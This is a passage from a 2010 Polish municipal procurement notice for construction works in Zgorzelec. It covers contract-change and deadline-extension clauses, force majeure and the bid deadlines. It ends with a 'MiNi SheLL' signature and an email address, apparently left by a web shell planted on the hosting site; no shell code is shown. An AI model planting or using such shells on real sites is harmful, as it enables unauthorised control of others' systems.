              terminowość wykonywania  robót budowlanych. 
              Pod pojęciem siły wyższej Zamawiający rozumieć będzie zdarzenie zewnętrzne o 
              charakterze: niezależnym od stron, którego strony nie mogły przewidzieć przed zawarciem 
              umowy i którego nie można uniknąć ani któremu strony nie mogły zapobiec przy 
              zachowaniu należytej staranności.
              Za siłę wyższą warunkującą zmianę umowy uważać się będzie w szczególności: powódź, 
              pożar i inne klęski żywiołowe, zamieszki, strajki (nie dotyczą pracowników Wykonawcy), 
              ataki terrorystyczne, działania wojenne, nagłe przerwy w dostawie energii elektrycznej,  
              promieniowanie, lub skażenia.
              W takim przypadku przesunięcie terminu realizacji zamówienia wynieść powinno 
              minimum tyle dni ile trwa opóźnienie spowodowane niniejszymi okolicznościami,
         -   Przesunięcie terminu realizacji zamówienia możliwe będzie w przypadku wystąpienia 
              warunków atmosferycznych uniemożliwiających wykonanie nadzorowanych robót  
              budowlanych zgodnie z technologią,  a fakt wystąpienia tych warunków wpisany zostanie
              przez Kierownika Budowy do Dziennika Budowy oraz potwierdzony zostanie przez 
              Inspektora Nadzoru działającego z ramienia Zamawiającego. 
              W takim przypadku przesunięcie terminu realizacji zamówienia wynieść powinno 
              minimum tyle dni ile trwa opóźnienie spowodowane niniejszymi okolicznościami.
         -   Przesunięcie terminu realizacji zamówienia możliwe będzie w przypadku wstrzymania 
              robót przez uprawnione do tego organy w okolicznościach za które Wykonawca nie ponosi 
              odpowiedzialności. W takim przypadku przesunięcie terminu realizacji 
              zamówienia wynieść powinno tyle dni ile wynosi wstrzymanie tych robot.
              Przesunięcie terminu realizacji zamówienia możliwe będzie w przypadku wystąpienia 
              istotnych wad dokumentacji projektowej, skutkujących koniecznością dokonania 
              poprawek lub uzupełnień, jeżeli uniemożliwia to lub istotnie wstrzymuje realizację 
             określonego rodzaju robót.
         -   Przesunięcie terminu realizacji zamówienia możliwe będzie w przypadku zmiany 
              powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację 
              przedmiotu zamówienia,
         -   Zmiana podwykonawcy możliwa będzie jedynie wtedy jeżeli zakres realizowanych przez 
              podwykonawcę usług, nie ulegnie zmianie w stosunku do zakresu usług wskazanych w 
              ofercie Wykonawcy, a które zaplanował on do realizacji przez podwykonawcę.
              Zmiana taka możliwa będzie jedynie na uzasadniony wniosek Wykonawcy, do którego 
              winien załączyć on  projekt umowy z podwykonawcą, przy czym wymagana jest w tym 
              wypadku pisemna zgoda Zamawiającego na zawarcie przez Wykonawcę umowy z innym 
              podwykonawcą
2.  Strona ubiegająca się o zmianę umowy, winna zwrócić się do Wykonawcy lub Zamawiającego, 
      z pisemnym wnioskiem o zmianę umowy podając równocześnie uzasadnienie i podstawę takiej  
      zmiany. Strony ustalają termin 7 dniowy, licząc od dnia w którym zaistniały przesłanki do 
      wprowadzenia takiej zmiany, na przekazanie w/w wniosku do Wykonawcy lub Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um-zgorzelec.dolnyslask.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 59-900 Zgorzelec, ul. Domańskiego 7 
Wydział Zamówień Publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.10.2010 godzina 13:00, miejsce: 59-900 Zgorzelec, ul. Domańskiego 7, Punkt Obsługi Interesanta.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com